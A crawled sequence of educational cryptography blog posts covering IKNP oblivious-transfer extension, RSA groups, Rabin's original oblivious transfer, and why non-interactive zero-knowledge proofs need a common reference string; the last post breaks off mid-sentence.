We’ll start with a quick reminder of what is an Oblivious-Transfer.
Oblivious-Transfer is a functionality which takes place between two parties.
The protocol realizing Oblivious-Transfer should satisfy three constraints:
Oblivious-Transfers (OTs) are useful for a wide range of applications (e.g., for Garbled-Circuits). I have also dedicated a post for showing how OTs can be constructed and why constructing them is not a trivial task. Moreover, all known constructions of OTs are based on some primitives beyond symmetric-cryptography. Amongst these primitives are RSA groups and elliptic-curve groups. Such primitives are typically computationally expensive, therefore, applications that require a large quantities of OTs, even if these OTs are done in parallel, may suffer from poor performance. At this point you are probably still eager to know what an OT extensions is?, so just before defining OT-extensions, I’d like to briefly introduce the notion of Hybrid Cryptosystems (to which I should probably dedicate a post someday).
:warning: Warning: If you don’t know about Public-Key Cryptography, you are encouraged to skip the following paragraph, it is given only as supplementary analogue of OT-extension from the realms of Encryption-Schemes.
OTs remind me of public-key-encryption (PKE) in the following sense: Public Key encryption are a computationally heavy tool, just like known implementations of OTs. To achieve secure communication, a naive cryptographer might be tempted to use this tool to encrypt each and every message sent between two communicating parties. However, encrypting 100% of the communication using PKE may lead to poor performance and increased costs for companies with millions of clients connected to them concurrently. From an engineering perspective we would prefer using secret-key encryption to secure the communication. However, secret-key encryption, as its name suggests, requires the communicating parties to agree on a secret key, unlike public-key encryption. We would be intrested, therefore, in a solution that is efficient as secret-key encryption, but preserves the conviniece of public-key cryptosystems. The solution is to use the public-key encryption tool only to realize a secure Key-Agreement (KA) protocol so that after this KA protocol ends, the communicating parties end up sharing a secret-key that will be used to encrypt the rest of the communication efficiently.
Similarly, protocols for OTs are computationally heavy. Consider the scenario where a naive cryptographer is willing to implement some protocol (e.g. Yao’s Garbled Circuits protocol) that requires a large number of OTs (say 100,000 OTs) between two parties. That is one party, $P_A$ holds 100,000 pairs of messages $(m_0^1,m_1^1),\ldots,(m_0^{100,000},m_1^{100,000})$ while another party $P_B$ holds 100,000 choice bits $b_1,\ldots,b_{100,000}$. We want to end up with $P_B$ receiving $m_{b_i}^i$ for $i=1,\ldots,100,000$ without $P_A$ learning anything about $P_B$’s choice bits and without $P_B$ learning anything about the message she didn’t choose. The naive cryptographer, therefore, might be tempted to run the OT protocol 100,000 times. Since the OT protocols we know as of today are computationally heavy, doing so might result in poor performance. We therefore are interested in realizing these 100,000 OTs without actually running the OT protocol 100,000 times. Achieving this goal is done by employing OT-Extension. In other words, OT-Extension, is a method to realize a large number of OTs from a small number of invocations of the OT protocol. It is important to clarify at this early point, that our goal is to minimize the computation, rather than the communication. That is, the main bottleneck for realizing large numbers of OTs is computational rather than communicational.
:bangbang: Spoiler: After we resolve the computational bottleneck, communication becomes the major bottleneck. While the problem of reducing the communication cost of OT-Extension has been extensively studied, we will not be focusing on these follow-up works today.
Let’s try and define the problem a little bit more concretely. First, we distinguish between OTs and secret key primitives, also known as “Minicrypt” (e.g Pseudorandom Generators (PRGs), One Way Functions (OWFs) and Sercret-Key Encryption). You may ask “but why?!”, and this is a rightful question. Why do we distinguish between OTs and secret key primitives? Well, there are two reasons for doing so, a practical one and a theoretical one. The practical reason is that we simply don’t know how to build protocols for OT that rely solely on secret key primitives! Indeed,if we do know, someday, this distinction will be meaningless. The theoretical reason, however, was brought by Impagliazzo and Rudich who showed in their paper “Limits on the provable consequences of one-way permutations” from 1989 that black box reductions from OT to OWF implies $P\neq NP$. Without getting into too much detail, it means that OTs that are constructed from secret key primitives would resolve the most fundamental question in theoretical computer science. While it isn’t impossible, it might be quite challenging for the time being with our existing knowledge in complexity theory, and therefore, for the time being, our distinction makes sense.
Moving forward with our problem definition, we would like to realize the following functionality, which we call $N$-OT. Where, informally speaking, two parties $P_S$ (the “sender”) and $P_R$ (the “receiver”) wish to realize $N$-OTs. That is, $P_S$ holds $N$ pairs of messages: ${(m_0^1,m_1^1),\ldots,(m_0^N,m_1^N)}$ and $P_R$ holds $N$ choice bits ${b_1,\ldots,b_N}$. Our protocol for $N$-OTs has to satisfy the following criteria (we mentioned at the beginning of the post for $N=1$):
As we already mentioned, one way to realize this protocol is simply via $N$ invocations of the OT protocol for a single message, but in order to reduce the computational complexity of our protocol, we add another criterion:
So just before seeing how exactly this problem can be solved, I’d like to discuss the historical chain of events that eventually led to the construction I’ll present later in the post.
As we mentioned earlier, in 1989 Impagliazzo and Rudich proved that building OTs from “black-box” symmetric key primitives would resolve the most fundamental question in theoretical computer science. Following that work, Donald Beaver in 1991 showed that a small number of OTs can be extended into a large number of OTs, which is what we are looking for today. Right? Well, yes and no. The way Beaver’s construction work is what cryptographers call “non-black-box”, that is, Beaver’s construction indeed use secret-key primitives (namely, a PRG) to extend a small number of OTs into a large number of OTs, but it did so in a “non-black-box” way. The term “non-black-box” means that Beaver did this extension while relying on the exact way the PRG is computed. To be exact, his construction doesn’t simply use PRGs as they were supposed to be used, but assumes the parties running Beaver’s construction have access to the boolean circuit computing the PRG itself. Cryptographer’s usually try to refrain from non-black-box constructions due to various somewhat technical reasons, for example in our case since the parties running Beaver’s extension algorithm have to be aware of the boolean circuit computing the PRG, so they cannot delegate the PRG computation to another party (what cryptographers call a “PRG Oracle”), as they must compute it themselves since the extension algorithm is meddling with the actual computation the PRG circuit is doing. In any case, refraining from non-black-box constructions also has practical reasons relating to the efficiency issues these constructions typically encumber.
So, since Beaver has outsmarted our criterion, let’s change the previous criterion a little bit:
The difference from the previous phrasing of the criterion is in bold, that is, we seek to use symmetric key primitives in a black box way.
Next, in 2003 Ishai, Kilian, Nissim and Petrank have published their paper (hereafter referred to as IKNP) “Extending Oblivious Transfers Efficiently” where they presented an OT extension relying on secret-key primitives (specifically, a PRG) in a black-box way. After presenting a problem and some of the relevant history led to the solution of it, in the rest of our post we shall focus on the construction of IKNP itself. But to fully understand it there is a minor subtelty we have to discuss first regarding OTs.
To make the problem of OT extension a bit “cleaner” we will present two different types of OTs:
This may sounds a bit counter-intuitive, but actually the first functionality (Chosen Message OT) is easier to realize than Random OT. Why so? Let’s try to prove it! If we show that from Random-OT we can construct Chosen-Message OT then indeed any protocol for Random-OT implies a protocol for Chosen-Message OT and therefore the latter is an easier problem. Well, given a protocol that samples random messages for the OT we can transform it into a chosen message OT as follows (relying only on symmetric primitives).
:warning: You are encouraged to stop reading and think about it for a few minutes.
The solution goes (informally) like this: Say the sender party received random messages $r_0,r_1$ from the Random-OT functionality while the receiver received $b, r_{b}$ from the Random-OT functionality. The realize a chosen message OT where the sender party inputs $m_0,m_1$ and the receiver has a choice bit $b’$ we can do the following:
The receiver sends to the sender $d = b\oplus b’$, this is a random bit since the bit $b$ is random and the sender doesn’t know $b$. In particular the sender doesn’t learn anything either about $b$ or $b’$ from this bit.
In other words, the idea is to use the random messages from the Random-OT functionality as symmetric key keys and send $b\oplus b’$ to the sender so it can “change the ordering” of its messages if $b\neq b’$.
In any case, since chosen-message OT can be built easily from Random-OT, IKNP construction will be focused on extending small number of OTs to large number of Random OTs.
IKNP focused in their paper of taking a small number ($\lambda$) of OTs, and extending them into large number ($N$) of Random OTs. Let’s see how it’s done. We denote by $\lambda$ as a security parameters, that is parameter which the higher it is being set, the more secure the protocol gets.
Since we can use secret-key primitives we will use a pseudorandom-generator ${\sf PRG}:\{0,1\}^\lambda \rightarrow \{0,1\}^N$ so that both the sender and the receiver will apply the PRG on all of their messages:
We can think at this point as $M_j^i$ as vectors in $\mathbb{F}_2^N$, that is vectors of length $N$ where each element in the vector is either $0$ or $1$, we can also think of $b_i$’s as elements in $\mathbb{F}_2$. We use “$+$” and “$-$” to denote addition/subtraction in $\mathbb{F}_2$ as well as point-wise addition of vectors in $\mathbb{F}_2^N$. The distinction between addition/subtraction is cosmetic, as in binary fields they have the exact same outcome. With this algebraic setting it holds that for any $i\in \{1,\ldots,N\}$:
\[M^i_{b_i} = M_0^i\cdot(1-b_i)+M_1^i\cdot b_i\]Indeed, convince yourself the above equation is correct both when $b_i=0$ and when $b_i=1$. By moving some terms from the right hand side of the equation to the left, we get:
\[M^i_{b_i} - M_0^i = (M_1^i-M_0^i)\cdot b_i\]To simplify, for each $i\in \{1,\ldots,N\}$
Therefore, we get:
\[\vec{w}_i - \vec{v}_i = \vec{u}_i \cdot b_i\]In fact, it will be easier in the rest of the post to use matrix notation rather then vector notation. Therefore, it will be easier to think of three matrices $W,V,U\in \mathbb{F}_2^{\lambda \times N}$ such that the $i$th row of $W,V,U$ will be $\vec{w}_i,\vec{v}_i,\vec{u}_i$ respectively. In addition, the receiver will denote by vector $\vec{b}=(b_1,\ldots,b_\lambda)$. Also, we introduce a little bit of notation:
With our new notation it holds that: $W-V=U\times\text{diag}(\vec{b})$ with “$\times$” denotes matrix multiplication. Be sure you understand why the equality above really holds. It might help to write the matrices explicitly so the above equality means that:
\[\begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{w}_1 & \vec{w}_2 & \dots & \vec{w}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} - \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{v}_1 & \vec{v}_2 & \dots & \vec{v}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} = \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{u}_1 & \vec{u}_2 & \dots & \vec{u}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} \times \begin{pmatrix} b_1 & 0 & \dots & 0\\\ 0 & b_2 & \dots & 0\\\ \vdots & \vdots & \ddots & \vdots\\\ 0 & 0 & \dots & b_\lambda \end{pmatrix}\]With $U,V$ known to the sender and $W,\vec{b}$ known to the receiver.
Notice that by now matrix $U$ is pseudorandom. Our goal at this point will be derandomizing the vectors $\vec{u}_i$ so that the columns matrix $U$ will all be equal to the same vector $\vec{u}^*$ known to the sender. In other words, we want the sender to send some “correction” information to the receiver, who in turn will update its vectors $\vec{w}_i$ into corrected vectors $\vec{w}_i’$ so that for all $i\in\{1,\ldots,\lambda\}$ we will have $\vec{w}_i’-\vec{v}_i=\vec{u}^*\cdot b_i$. It is crucial that the receiver will not be able to learn anything about the sender’s $\vec{v}_i,\vec{u}_i$ or $\vec{u}^*$ from the correction information it received.
Without further ado, let’s see how the derandomization process goes. For each $i\in\{1,\ldots,\lambda\}$ the derandomization of $\vec{u}_i$ is done by:
Notice that now the equality holds:
\[\begin{aligned} \vec{w}_i' - \vec{v}_i &= \vec{w}_i - \vec{v}_i + \bar{u}_i\cdot b_i \\ &= \vec{u}_i\cdot b_i + \bar{u}_i \cdot b_i \\ &= \vec{u}_i\cdot b_i + \vec{u}^*\cdot b_i - \vec{u}_i\cdot b_i \\ &= \vec{u}^* \cdot b_i \end{aligned}\]As requested.
For each $i$ the sender sends $\bar{u}_i$, a vector of length $N$, so over all the communication in this step is $\lambda N$ bits.
After this step the receiver updates its matrix $W$ into matrix $W’$ whose $i$th column is $\vec{w}_i’$. Also, the sender updates its matrix $U$ so now it all has the same column $\vec{u}^*$. In fact, let the sender foget about the matrix $U$ and just store the vector $\vec{u}^*$. So now it holds that $W’ - V = \vec{u}^* \times \vec{b}^T$ where $\vec{b}^T$ is just $\vec{b}$ written as a row vector. The following can be helpful to visualize the foregoing matrix equality:
\[\begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{w}_1' & \vec{w}_2' & \dots & \vec{w}_\lambda' \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} - \begin{pmatrix} \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \vec{v}_1 & \vec{v}_2 & \dots & \vec{v}_\lambda \\ \bigg\vert & \bigg\vert & \dots & \bigg\vert \\ \end{pmatrix} = \begin{pmatrix} \vec{u}^*_1 \\ \vec{u}^*_2 \\ \vdots \\ \vec{u}^*_\lambda \\ \end{pmatrix} \times \begin{pmatrix} b_1 & b_2 & \dots & b_n \end{pmatrix}\]Also notice that $\vec{u}^* \times \vec{b}^T$ is a “Tensor Product” which simply means that the result is a matrix $M$ such that $M_{i,j}=\vec{u}^*_i \cdot b_j$.
This is the trickiest part, or at least it was the hardest for me to get initially when I read about IKNP, though it isn’t very technical there is something beautiful about it when you get it.
Following the last equation from last states that: $W’ - V = \vec{u}^* \times \vec{b}^T$ Therefore, for each row $j$ of the matrices $W’,V$ it holds that:
\[W'_{j,\cdot} - V_{j,\cdot} = \vec{u}^*_j \cdot \vec{b}^T\]In other words, it means that the row vector reulsting from subtracting the $j$th row of $V$ from the $j$th row of $W’$ equals the $j$th element from vector $\vec{u}^*$ (that is, $\vec{u}^*_j$) multiplied by row vector $\vec{b}^T$.
Notice that $W’_{j,\cdot}$, $V_{j,\cdot}$ as well as $\vec{b}$ are vectors in $\mathbb{F}_2^\lambda$ and $\vec{u}^*_j$ is just a single bit. In this stage for each $j\in \{1,\ldots,N\}$:
Now if you look closely, the sender, who holds $V_{j,\cdot}$ actually holds $\vec{r}_{c_j}^j$. This looks very much like the original OT correlation, right?
But we got the roles flipped! Because our receiver party is the that holds two messages and the sender party holds a choice bit and the message corresponding to its choice. So we managed to get an OT correlation where the receiver of the original OTs is actually a sender and the sender of the original OTs became a receiver.
This feature of IKNP is important to mention. To OT extensions works by extending a small number of OTs into a large number of OTs while flipping the roles between the sender and the receiver.
One last property of the resulting OTs, which will take us to the last and final step of IKNP, is that we were seeking Random OTs. However, in the resulting OT correlation (of the $\vec{r}_0^j,\vec{r}_1^j$ and choice bit $c_j$) it holds that the OT messages $\vec{r}_0^j,\vec{r}_1^j$ are not so random. Notice that for all $j\in\{1,\ldots,N\}$ the subtraction of the messages satisfies:
\[\vec{r}_1^j - \vec{r}_0^j=\vec{b}\]Notice that a truly random OT will not have this property, since for random messages, their difference is also random. Using a more professional jargon, the messages $\vec{r}_0^j$ and $\vec{r}_1^j$ are correlated with $\vec{b}$ being the correlation. Therefore the last step in the IKNP construction is breaking the correlation.
This step is quite technical, at the beginning of it:
To break the correlation the IKNP suggests one of the following options:
If we assume the “Random Oracle Model” where both parties have access to a random function $\mathcal{O}:[N]\times\{0,1\}^\lambda \to \{0,1\}^\lambda$ then:
This resulting correlations where $P_R$ holds $(h_0^1,h_1^1),\ldots,(h_0^N,h_1^N)$ and $P_S$ holds $(c_1,h_{c_1}^1),\ldots,(c_N,h_{c_N}^N)$ is a truly random set of $N$ OT correlations, that is since a random oracle, being a truly random function, is very unlikely to preserve the correlations.
If we prefer not assuming the “Random Oracle Model” then IKNP also propose the usage of “Correlation Robust Hash Functions”, a cryptographic construct which can be thought of as just a regular function with the restriction (that is satisfied by almost all real-life construction of hash functions), then for a random “offset” $R$ the hash function $H(x+R)$ is pseudorandom. In their paper they show that Correlation Robust Hash Functions are sufficient to break the correlation.
If we combine all previous steps we get the following protocol.
The above protocol is secure against semi-honest adversaries. Without getting too deeply into the definitions, it means that “if everyone follow the protocol, no inadvertant leakage of information will occur”. But what happens if one of the parties decides to deviate from the protocol? IKNP did address this issue in their paper, but before jumping into it let’s think – what can go wrong? The parties can only cheat wherever they communicate and the only communication in our protocol (assuming the Base-OTs are secure) is in the derandomization phase. The party $P_S$ has to use the same $\vec{u}^*$ when computing all the correction vectors $\bar{u}_i$, it may decide not to do so, which might help $P_S$ guessing what the resulting message of $P_R$ or some information about it. To ahiceve security against malicious adversaries we have to ensure that $P_S$ is consistent in the way it computed the correction vectors. I’ll try explaining very briefly what IKNP did to achieve security against malicious adversaries. IKNP solve this problem with the classical approach of “cut-and-choose” instead of running the algorithm once, they run it $2^\sigma$ times for some security parameter $\sigma$ and then they let the $P_R$ party ask from $P_S$ to “open” their secret $U,V$ matrices in exactly $2^{\sigma-1}$ of the executions. If $P_S$ cheated on a significant portion of the executions, it be caught with good probability and therefore it is safe to assume that the unopened executions are safe.
Notice that this “cut-and-choose” approach is simply but is very expensive in terms of computation and communication.
The protocol of IKNP has been a foundational building block for further research on efficient OT extensions that came afterwards. The computational cost of IKNP per OT is negligible compared to the heavy machinery incorporated in running a Base-OT protocols. However, as we have seen towards the end of the post, the main drawbacks of IKNP construction are:
Thank you for reading this post! I did take a lot of time writing it, so if it helped you somehow, I’ll be happy to know.
I’ll also be happy to hear your thoughts, questions and corrections, so feel free to reach out in any of the ways listed at the bottom of the page :smiley:
]]>RSA is named after its three inventors: Ronald Rivest, Adi Shamir and Leonard Adleman who published in 1978 their paper titled: “A Method for Obtaining Digital Signatures and Public-Key Cryptosystems” (paper link).
I think its really amazing reading this paper in particular and old papers in general as it gives you some perspective about how life looked like tens of years ago! Just as an example, the paper begins with the following:
The era of “electronic mail” [10] may soon be upon us; we must ensure that two important properties of the current “paper mail” system are preserved: (a) messages are private, and (b) messages can be signed. We demonstrate in this paper how to build these capabilities into an electronic mail system.
It is sometimes hard to believe that all this progress was done back in the 1970s without the internet, or perhaps these inventions is what made the internet possible. Just imagine, they had no emails!
Anyway, back to our original topic.
Before jumping into RSA, let’s see what was so innovative about it. Say we have Alice and Bob who wish to secretly communicate, how can they do this? Up until the invention Assymetric Cryptography both Alice and Bob have had to agree on some secret key which will later be used to encrypt and decrypt the information they exchange. Since only the two communicating parties knew the key the channel was assumed to be secret. In the old days (and by old I mean up until the 1970’s) this key had to be exchanged over a secure channel. These “secure channels” were typically just armed convoys carrying a printed key material. But today none of this happen, when you connect to the internet you don’t have to send a secure envelope to the server with guards sailing across the ocean :thinking:.
The cornerstone of the technology that lets us connect to websites without any convoys is the seminal work of Whitfield Diffie and Martin Hellman who published in 1976 their legendary paper titled “New Directions in Cryptography” (paper link), which led to a Key-Exchange protocol popularized under the name “Diffie-Hellman Key-Exchange”.
:warning: Notice: While we won’t get into the Diffie-Hellman protocol here, we do have to understand it allows two parties to exchange information on publicly from which a secret key can be derived, known only to these two parties.
The Diffie-Hellman protocol ends with two parties having a Symmetric Key. By “Symmetric” we mean that both parties hold the same key and this key is used for both encryption and decryption.
The major innovation in the RSA cryptosystem is that keys don’t have to be symmetric anymore! Instead, each party $P_i$ generates a secret key $sk_i$ and a public key $pk_i$. The secret key is kept secret and the public key is publicly published. Whenever someone wants to send $P_i$ a message $m$ it encrypt $m$ with the public key $pk_i$. The RSA cryptosystem is built such that ciphertexts created this way can be efficiently decrypted using the secret key $sk_i$ but since only $P_i$ holds this secret key it will be the only party being able to read these messages!
So, if two parties $P_1,P_2$ wish to communicate, $P_1$ will sends $P_2$ messages using $P_2$’s public key $pk_2$ and $P_2$ will sends messages to $P_1$ using $P_1$’s public key $pk_1$. Each party will decrypt its incoming messages using its secret key $sk_1$ or $sk_2$.
Let’s see how RSA make this magic happen.
:warning: Notice: I’ll be assuming that you know a little bit about group theory here but nothing too deep.
Given two distinct primes $p,q$ we call $N=pq$ an RSA-modulus. We denote by $\mathbb{Z}^\ast_N$ the set of numbers between $1$ and $N-1$ that are coprime to $N$. Notice that each number dividing $N$ has to divide at least one of its prime factors which are $p$ and $q$ so $\mathbb{Z}^\ast_N$ is the set of all numbers between $1$ and $N-1$ that are neither a multiple of $p$ nor $q$.
An RSA group is a group whose elements are $\mathbb{Z}^\ast_N$ for some RSA-modulus $N$ and the group operation is the modular multiplcation modulo $N$.
Let’s have an example. Let $p=3$ and $q=5$ we have $N=p\cdot q = 15$ so $\mathbb{Z}^\ast_N=\lbrace 1,2,4,7,8,11,13,14\rbrace$. Our RSA group operation will take two numbers from $\mathbb{Z}^\ast_N$ and multiply them modulo $15$, for example $4*7=28 \equiv 13 \mod 15$. So if we apply the group operation on $4$ and $7$ we get $13$.
One characteristic of groups is that each element should have an inverse. We say that $a,b$ are inverse if $a*b=1$ according to the group operations. For example $2\ast8=16 \equiv 1 \mod 15$ so $2$ and $8$ are the inverse of each other!
One question you can ask is: “Given a number $a$ in $\mathbb{Z}^\ast_N$, how fast can we find its inverse?”. According to a popular theorem called the Chinese Remainder Theorem finding the inverse of $a$ in the RSA group can be done very efficiently if we know $p,q$, the factors of $N$. But what if we don’t know them and instead we are just given $N$? Well, we don’t really know but we assume that it is very hard and for sufficiently large $p,q$ it can take very long time.
:memo: Notice: If anyone invalidates this assumption it means that the RSA cryptosystem will be immediately broken.
:memo: Notice 2: The security of RSA isn’t simply reduced to the validity of this assumption, in fact, it has been shown.
To be continued…
]]>In this post we’re going to get to know one of the most fundamental constructions in cryptography known as Oblivious Transfer or OT for short. It has been used in wide spectrum of topics in cryptography, and as such I must admit that I’m very excited to finally to get write about it!
Let’s start with a real life scenario^{1}! Say we have Alice and Bob, where Alice has two messages $m_0,m_1$ and Bob has a bit $b \in \lbrace 0,1 \rbrace$ such that Bob wants to retreive message $m_b$, how can Bob and Alice do this? Well, if Bob doesn’t care much about his privacy, he could send Alice the bit $b$ and Alice would send him $m_b$ in return. But what if Bob does care about his privacy? Of course Alice can send Bob both $m_0,m_1$ and Bob will simply pick $m_b$, but this also violates the privacy of Alice! So, if both parties care about their privacy we want Bob to learn $m_b$ without Alice learning $b$ and without Bob learning $m_{1-b}$. While this may sound impossible and paradoxical at this point, it is actually possible and if you finish reading this post you’ll probably be surprised by how simple it is. If Alice is tranferring $m_b$ to Bob while preserving all these privacy constraints, we say Alice Obliviously Transfers $m_b$ to Bob.
Without getting into the the technical details we can already say that Oblivious-Transfer is a general name for protocols with which one party can obliviously transfer data to another party. By “general name” I mean that just like sorting is a “general name” for various algorithms that sort data, OT is a name for protocols that obliviously transfer data. This also means that OT protocols take place between two parties: A sender who offers messages to be sent and a receiver who selects to receive one of the offered messages.
Let’s start with a short history of the problem.
The first appearance of Oblivious-Transfer was in a paper by Michael (Oser) Rabin from 1981 and it didn’t even match the definition we have given here. In the original version the sender had a single message $m$ and at the end of the protocol the receiver may either learn $m$ with probability $1/2$ or learn nothing with probability $1/2$ without the sender knowing if $m$ was indeed learned or not.
:bulb: Cool Fact: The original paper was manually written! Tal Rabin noticed that the copies were becoming hard to find and decided to upload a scanner version. You can find the original manuscript as well as a typeset version on ePrint. (Paper link)
:bulb: Cool Fact 2: Tal is Michael’s daughter.
A few years later, in 1985, Even, Goldreich and Lempel have given a construction to the OT as we have seen here, where one-of-two messages is being retreived. (Paper link)
Since then, various constructions have been proposed to OT, one of them, titled “The Simplest Protocol for Oblivious Transfer” by Chou and Orlandi published in 2015 is what we will see today in greater detail.
In this section we’ll see the original construction of Michael Rabin for “OT”, we put the “OT” in quotes since it doesn’t really match our definition for OT. I start with it both as a nice historical lesson and because it gives a good sense on the underlying concepts from which OT can built!
In this “OT” protocol we will have two parties, Alice and Bob. At the beginning of the protocol Alice holds a message $m$ while Bob has no input. At the end of the protocol we want Bob to learn $m$ with probability $1/2$ and learn nothing with probability $1/2$ without Alice knowing whether Bob did learn or didn’t learn $m$ eventually!
The construction of the protocol relies on RSA groups, so first let’s recall what RSA groups are.
Given two distinct primes $p,q$ we call $N=pq$ an RSA-modulus. We denote by $\mathbb{Z}_N^*$ the set of numbers between $1$ and $N-1$ that are coprime to $N$. Notice that each number dividing $N$ has to divide at least one of it’s prime factors which are $p$ and $q$ so $\mathbb{Z}^*_N$ is the set of all numbers between $1$ and $N-1$ that are neither a multiple of $p$ nor $q$.
An RSA group is a group whose elements are $\mathbb{Z}^*_N$ for some RSA-modulus $N$ and the group operation is modular multiplcation modulo $N$.
Let’s have an example. Let $p=3$ and $q=5$ we have $N=15$ so $\mathbb{Z}^*_N={1,2,4,7,8,11,13,14}$. Our RSA group operation will take two numbers from $\mathbb{Z}^*_N$ and multiply them modulo $15$, for example $4*7=28 \equiv 13 \mod 15$. So if we apply the group operation on $4$ and $7$ we get $13$.
One characteristic of groups is that each element should have an inverse. We say that $a,b$ are inverse if $a*b=1$ according to the group operations. For example $2*8=16 \equiv 1 \mod 15$ so $2$ and $8$ are the inverse of each other!
One question you may ask is: “Given a number $a$ in $\mathbb{Z}_N^*$, how fast can we find its inverse?”. According to a popular theorem called the Chinese Remainder Theorem finding the inverse of $a$ in the RSA group can be done very efficiently if we know $p,q$, the factors of $N$. But what if we don’t know them and instead we are just given $N$? Well, we don’t really know but we assume that it is very hard and for sufficiently large $p,q$ it can take very long time. This assumption is the RSA assumption and that is what Rabin has also assumed while constructing his original OT.
This is only cryptographers’ real lives :wink: ↩
In this post I assume the reader is familiar with the term NIZK (Non-Interactive Zero-Knowledge), what people these days also call “zk-SNARKs”. I’m by all means not an expert in ZK (Zero Knowledge) and as so you are not expected to be familiar with all the low level technical details used to construct such argument systems. If you’ve never heard about NIZK/SNARKs check out Wikipedia’s page about it until maybe some day I’ll write something about it myself!
I’ll also be assuming some familiarity with basic concepts from complexity theory, but if there’s anything on this part that is left uncovered, feel free to contact (see the contact page).
Ok, so you’ve probably heard something about SNARKs in the past and have heard about different projects which incorporate some sort of a Non-Interactive ZK to establish some application, typically a distributed ledger. Some of these projects include: StarkWare, zk-Sync, ZCash, Mina, Dark Forest, Aleo and many others.
These projects rely on what’s called a proof system (or better yet, an argument system). This system is typically the core foundation of the cryptography enabling these projects. In short, these systems are the NIZK/SNARKs and in the past few years a myriad of such systems were published, pushing the boundaries of efficiency and security one step at a time. Just to name a few of these systems, we have Gorth16, PLONKs, Bulletproofs, STARKs, Ligero, Halo, Marlin, Sonic and probably by the time I end writing this post at least one more will be published.
Now if you ever get into any of these projects’ documentations you’ll find (or at least I really hope you’ll find) some information containing the term “setup”, typically accompanied by the term “trusted” or “trustless”. This term is used to convey the message that any of these projects was initially bootstrapped by a process (a setup) which is either “trustless” or “trusted”. In the “trusted” flavor a user will have to believe that the parties who took part in such setup behaved honestly while in the “trustless” flavor no such belief is required. The result of this setup (either trusted or trustless) is what is typically called a CRS (Common Reference String). This is a public string containing some parameters that are later used by the argument system. Just as an example the Groth16 (paper link) system trusted setup yields what’s known as the “Powers of Tau”, since the CRS simply contains a set of powers of some group element, denoted with $ \tau $ (the greek letter Tau).
Some of you might have asked yourselves, “Why is a trusted setup needed?”. You probably won’t be surprised to find the same question on stackexchange. While the answers to this question may have their merit (I’m not here to criticize any of them), they typically revolve around why a trusted setup is used, compared to a trustless setup. None of these answers tell why is the setup needed at all! This is also portrayed well in Vialik Buterin’s great post about trusted setups. Let me quote the beginning of his post:
Many cryptographic protocols, especially in the areas of data availability sampling and ZK-SNARKs depend on trusted setups. A trusted setup ceremony is a procedure that is done once to generate a piece of data that must then be used every time some cryptographic protocol is run.
Why is this piece of data must be used? After all, even these trustless setup systems, still have to run some setup procedure and this setup typically makes at least some cryptographic assumtions. For example, the STARK CRS is secure only by assuming CRH (collision resistant hashing). Now I’m obviously not here to disprove the CRH assumption, but if there’s something more secure than having a trustless setup is having no setup at all, right? If so, why haven’t we seen “setup-less” NIZK systems?
The answer to this question is going to be the topic of this post. Let’s begin!
The notion of interactive proof (IP) systems followed by the notion of Zero-Knowledge proofs was established in the mid-1980s in the seminal work by Goldwasser, Micali and Rackoff from the [GMR] paper (Title: “The Knowledge Complexity Of Interactive Proof Systems”) in which they show how a proof system may possess the property of zero-knowledge. The main idea in the paper is that if a prover $ P $ wants to prove something to a verifier $ V $ usually in the process of proving some infomation could leak. Let’s have an example. Say we want to design a proof system to show that some number $ n $ is composite (i.e. it isn’t prime). The most naive way to do so would be having the prover send some number $ k $ to the verifier who will check that the given number $ k $ really divides $ n $. This is great, but notice that the verifier not only learned that $ n $ is composite, but also learned that $ k $ is a divisor of $ n $.
So, in their paper they have defined a new complexity class, denoted $ KC(0) $, which stands for “Knowledge-Complexity 0” that became later known as zero-knowledge as we know it today.
It didn’t take long until it was proven that all problems in $ NP $ have a zero-knowledge proof systems in the amazing paper by Goldreich, Micali and Wigderson link, also known as GMW. (Title: Proofs that Yield Nothing But Their Validity or All Languages in NP Have Zero-Knowledge Proof Systems).
As a side note for those who don’t know about $ NP $, think of it as the set of problems for which a prover can give a proof which isn’t too long and that can be efficiently verified by the verifier.
While this sounds really exciting, the constructed proof-system for all problems in $ NP $ was still interactive, but we’re interested in non-interactive zero-knowledge (NIZK) proof systems! So, a short time after GMW, Blum, Feldman and Micali published a paper about NIZK (Title: Non-interactive zero-knowledge and its applications). In their paper they show how any language in $ NP $ can have a NIZK proof-system if some short random string is shared between the prover and the verifier, this is the common reference string (CRS)!
But still, the fact that some construction used a CRS doesn’t mean it is mandatory, right? Yes, and this is exactly what led Goldreich and Oren to publish in the mid 1990s their paper dealing exactly with this question (Title: Definitions and Properties of Zero-Knowledge Proof Systems). In their paper they prove that any NIZK not using a CRS is limited to proofs for problems in $BPP$.
Roughly spekaing, $ BPP $ is the set of problems having efficient randomized algorithms to decide them with good probability.
Unless something very unexpected happens in the future, we believe that $ BPP $ isn’t a very “Big” set of interesting problems. More concretely, when using your favorite SNARK, you create a proof that a certain circuit is satisfiable. The circuit satisfiability problem is in $ NP $ and unless some very unexpected news come from complexity theory guys, this problem isn’t in $ BPP $. So, according to Goldreich and Oren to create a NIZK for circuit satisfiability we must have a CRS shared between the prover and the verifier. In the rest of the post we’ll try to prove it, because I think the idea behind the proof is quite simple and worth understanding.
Before proving let’s recall what Zero-Knowledge really means. Conceptually, Zero-Knowledge means that no information is leaked in the process of proving. If no information is leaked, then obviously the verifier can generate a similar proof by itself, without any access to the proof, right? Because if it can do this then it learned nothing from the proof and if it can’t do this then there’s something in the proof itself that is helping the verifier create other “similar” proofs. In other words the verifier can “simulate” the process of proving by itself. More formally, given a prover $ P $ who wants to prove some statement $ x $ to a verifier $ V $, we say that the proof system is Zero-Knowledge if there exists a randomized algorithm $ S $ which we call a simulator which on input $ x $ yields an output denoted $ S(x) $ that can be interpreted as a simulation of the interaction between the prover and the verifier. The simulator also has to be efficient. This definition is not 100% accurate, but let’s leave it like that as it grasps the core notion of the full definition. The important thing to pay attention to is the fact that the simulator can create such transcripts without any access to a proof for the validity of the statement $ x $! In any case, we say that the proof system is Zero-Knowledge if there’s no (efficient) 